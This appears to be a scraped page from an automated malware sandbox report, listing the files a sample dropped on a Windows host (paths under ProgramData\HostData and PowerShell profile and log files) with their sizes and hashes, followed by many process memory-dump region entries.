2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json

Filesize
319B

MD5
a255f408bc0a2edbd88f9425f7f6ce5b

SHA1
352f7b9f0f99b3037b88e6c7bf8e9925edbca96e

SHA256
53de4fd5e2ca23d0481c6c14387d720d5ac8581f94b00a0b18cfa45d72bcdf93

SHA512
51a1ac8668b78f92710d1053b2276b48c2bc7ea9e459d1dd27e661bd8c0015b0df58bbc672e5d04e5306d4cf95f4e490f9878005bb62f7631e1cda8bd090c31d

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
5a2812b775b17bc721ec808fe46cccdc

SHA1
b186895e093bffa131a3a7f936d75c8314f7ae2f

SHA256
72e122375917d4465af3bcd15d2dc5e0f6cb96a3a2f1fa5681d4fd512de79bba

SHA512
8693113b17a106f73cc3563dc8894d65a6a215d5de72547bf64791b04f734749c34b242a0c87651d1374eb30938ec134ce120fe4fb15292dffa44b294c9afce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c4cbd3ab99b452190430dc925c62c935

SHA1
65b7018fae1879a25d0ca197bb00c1f781fa4466

SHA256
831f7150fcbdaa70fcc121dfcc923fd820ac156567f20d4870d328ae705d7bd8

SHA512
94a95a06b18266216b32f2d269923588276931b9e8f41f924aa329f155a22bf1c6ea741cad0b3c155b20b14c0605b5ce713a1b3c48bb8b43f1cb242498495ec9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c99bc1c5176c47db34d19da1ea9e2193

SHA1
ebb9220835917eea20b2f6948f5ae2d455472b1b

SHA256
708cd8f34d29d72261b775b2bdabc4547cfe66b7e5de06556aa45f10ec113117

SHA512
b9974f01cb5cd189f277c30b90327038d1314c640110a313af05bbfaa57eff3f1eb0033913fedc9c90c0a3896447f33df870de1835b0659f6134fa26c668245e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9afe6e7fefb1b1e4f9f6716d7f1c9f03

SHA1
bc1bcfb6603ba1ff4854f9f00c685ccd849b3d29

SHA256
9bd0edb9f953a28ae80e07c0a4ba8e18af2890a3aff8a5d42c77ff1aef597c80

SHA512
56fb6dc5d712ab2d1dda0fac69ec08101463c71cd925cd0d65b50be51664adb607bc9a364dee505434d23b711a9117ada492f72f06e16523050ac01f6107a049

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6839554969507ce917c92f53c80f9cec

SHA1
16f37e1943ba1aa8f30db3146afd66a3008153c4

SHA256
90723cc60298720f11d69f15a9c73c4ea074d75aa72cbe431191b43d5957d75a

SHA512
62042ab7521640d7420355ba85a6156e575ededc5216c949d6cb72681ed8117ce9bfe66cd77a2ffbdbc5124b72b106f186a64cc31dec5c00f1859d5e4a54ff04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ebf9bf13af78ddcc91beb52d9751c9fc

SHA1
6126c2a27ee350f88ca0a56198e7574189322180

SHA256
f25cf767aba632898f53d9902c3c1e6a9b9c26ce99806bc53ef4a014453c1b45

SHA512
ae54414653f2f3ce9da8ad49ca697d34eac9182a522cdee2087d626d5069558d0cf24e64fb6b03a71e9f4fd2e2869a15169a1e970fa61d5ebe44a0d02a7a997a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rekqs5jz.iqg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1304-296-0x000000007F470000-0x000000007F480000-memory.dmp

Filesize
64KB

Download
memory/1304-274-0x0000000070660000-0x00000000706AC000-memory.dmp

Filesize
304KB

Download
memory/1304-263-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/1304-228-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/1844-251-0x0000000070660000-0x00000000706AC000-memory.dmp

Filesize
304KB

Download
memory/1844-226-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/1844-250-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/1844-224-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/1844-261-0x000000007FAA0000-0x000000007FAB0000-memory.dmp

Filesize
64KB

Download
memory/3364-329-0x0000000001180000-0x00000000011A0000-memory.dmp

Filesize
128KB

Download
memory/3364-330-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-328-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-327-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-326-0x0000000001110000-0x0000000001150000-memory.dmp

Filesize
256KB

Download
memory/3364-331-0x0000000001180000-0x00000000011A0000-memory.dmp

Filesize
128KB

Download
memory/3364-332-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-333-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-324-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/3364-334-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-335-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3364-336-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3808-173-0x0000000007110000-0x000000000712A000-memory.dmp

Filesize
104KB

Download
memory/3808-174-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/3808-144-0x0000000004790000-0x00000000047C6000-memory.dmp

Filesize
216KB

Download
memory/3808-145-0x0000000004E10000-0x0000000005438000-memory.dmp

Filesize
6.2MB

Download
memory/3808-147-0x00000000055C0000-0x00000000055E2000-memory.dmp

Filesize
136KB

Download
memory/3808-148-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/3808-146-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/3808-154-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/3808-183-0x0000000007380000-0x0000000007388000-memory.dmp

Filesize
32KB

Download
memory/3808-182-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/3808-181-0x0000000007340000-0x000000000734E000-memory.dmp

Filesize
56KB

Download
memory/3808-159-0x0000000005E60000-0x0000000005E7E000-memory.dmp

Filesize
120KB

Download
memory/3808-177-0x0000000007390000-0x0000000007426000-memory.dmp

Filesize
600KB

Download
memory/3808-160-0x0000000006390000-0x00000000063C2000-memory.dmp

Filesize
200KB

Download
memory/3808-176-0x0000000007170000-0x000000000717A000-memory.dmp

Filesize
40KB

Download
memory/3808-161-0x00000000703A0000-0x00000000703EC000-memory.dmp

Filesize
304KB

Download
memory/3808-171-0x0000000006370000-0x000000000638E000-memory.dmp

Filesize
120KB

Download
memory/3808-175-0x000000007F950000-0x000000007F960000-memory.dmp

Filesize
64KB

Download
memory/3808-172-0x0000000007770000-0x0000000007DEA000-memory.dmp

Filesize
6.5MB

Download
memory/4272-308-0x000000007EE60000-0x000000007EE70000-memory.dmp

Filesize
64KB

Download
memory/4272-298-0x0000000070660000-0x00000000706AC000-memory.dmp

Filesize
304KB

Download
memory/4272-236-0x0000000004D70000-0x0000000004D80000-memory.dmp

Filesize
64KB

Download
memory/4404-225-0x0000000007E60000-0x0000000007E70000-memory.dmp

Filesize
64KB

Download
memory/4404-193-0x0000000000F50000-0x0000000000F66000-memory.dmp

Filesize
88KB

Download
memory/4404-318-0x0000000007E60000-0x0000000007E70000-memory.dmp

Filesize
64KB

Download
memory/4624-264-0x0000000070660000-0x00000000706AC000-memory.dmp

Filesize
304KB

Download
memory/4624-294-0x000000007EFD0000-0x000000007EFE0000-memory.dmp

Filesize
64KB

Download
memory/4624-262-0x00000000029A0000-0x00000000029B0000-memory.dmp

Filesize
64KB

Download
memory/4624-227-0x00000000029A0000-0x00000000029B0000-memory.dmp

Filesize
64KB

Download
memory/4656-140-0x0000000007E80000-0x0000000007F12000-memory.dmp

Filesize
584KB

Download
memory/4656-143-0x0000000008190000-0x00000000081A0000-memory.dmp

Filesize
64KB

Download
memory/4656-141-0x0000000007E60000-0x0000000007E6A000-memory.dmp

Filesize
40KB

Download
memory/4656-134-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/4656-142-0x00000000080C0000-0x0000000008126000-memory.dmp

Filesize
408KB

Download
memory/4656-188-0x0000000008190000-0x00000000081A0000-memory.dmp

Filesize
64KB

Download
memory/4656-139-0x0000000008390000-0x0000000008934000-memory.dmp

Filesize
5.6MB

Download
memory/4688-295-0x00000000028B0000-0x00000000028C0000-memory.dmp

Filesize
64KB

Download
memory/4688-230-0x00000000028B0000-0x00000000028C0000-memory.dmp

Filesize
64KB

Download
memory/4688-229-0x00000000028B0000-0x00000000028C0000-memory.dmp

Filesize
64KB

Download
memory/4688-284-0x0000000070660000-0x00000000706AC000-memory.dmp

Filesize
304KB

Download
memory/4688-297-0x000000007EFC0000-0x000000007EFD0000-memory.dmp

Filesize
64KB

Download